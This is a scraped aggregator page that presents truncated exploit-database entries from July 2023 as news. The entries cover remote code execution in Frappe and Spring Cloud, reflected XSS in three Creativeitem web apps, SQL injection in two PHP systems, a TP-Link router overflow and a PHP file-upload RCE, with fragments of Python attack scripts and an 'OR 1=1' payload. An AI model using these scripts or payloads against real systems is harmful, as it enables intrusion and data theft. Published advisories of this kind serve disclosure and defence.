📰 Exploit Author News
Page 7 - Exploit Author News Today
Fast, Ad-Free News Updates
Stay updated with breaking news from Exploit Author. Real-time updates on events, politics, business and more.
July 12, 2023
# Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)# Exploit Author: Sander Ferdinand# Date: 2023-06-07# Version: 13.4.0# Vendor Homepage: http://erpnext.org# Software Link: https://github.com/frappe/frappe/# Tested on: Ubuntu 22.04# CVE : noneSilly sandbox escape.> Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.Requirements:- 'System Manager' role (which is
July 12, 2023
# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)# Date: 07/07/2023# Exploit Author: GatoGamer1155, 0bfxgh0st# Vendor Homepage: https://spring.io/projects/spring-cloud-function/# Description: Exploit to execute commands exploiting CVE-2022-22963# Software Link: https://spring.io/projects/spring-cloud-function# CVE: CVE-2022-22963import requests, argparse, jsonparser = argparse.ArgumentParser()parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/fu...
July 11, 2023
# Exploit Title: Atlas Business Directory Listing 2.13 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/atlas/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan
July 11, 2023
# Exploit Title: Academy LMS 5.15 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /home/coursesGET
July 11, 2023
# Exploit Title: Mastery LMS 1.2 - Reflected XSS# Exploit Author: CraCkEr# Date: 09/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/mastery/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## DescriptionAllow Attacker to inject malicious code into website, give ability to steal sensitiveinformation, manipulate data, and launch additional attacks.Path: /browseGET
July 7, 2023
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system_info/contact_information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system_info/contact_information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 -- &q...
July 5, 2023
# Exploit Title: Beauty Salon Management System v1.0 - SQLi# Date of found: 04/07/2023# Exploit Author: Fatih Nacar# Version: V1.0# Tested on: Windows 10# Vendor Homepage: https://www.campcodes.com # Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/# CWE: CWE-89Vulnerability Description -Beauty Salon Management System: V1.0, developed by Campcodes, has beenfound to be vulnerable to SQL Injection (SQLI) attacks. This vulnerabilityallows an
July 4, 2023
# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : hardware# Dork : /userRpm/WanDynamicIpV6CfgRpm# Tested on: Windows/Linux# CVE : CVE-2023-36355import requests# Replace the IP address with the router's IProuter_ip = '192.168.0.1'# Construct the URL with the vulnerable endpoint and parameterurl = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='# Replace the payload with
July 4, 2023
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi# Date: 30/06/2023# Exploit Author: Matin nouriyan (matitanium)# Version:
July 4, 2023
# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and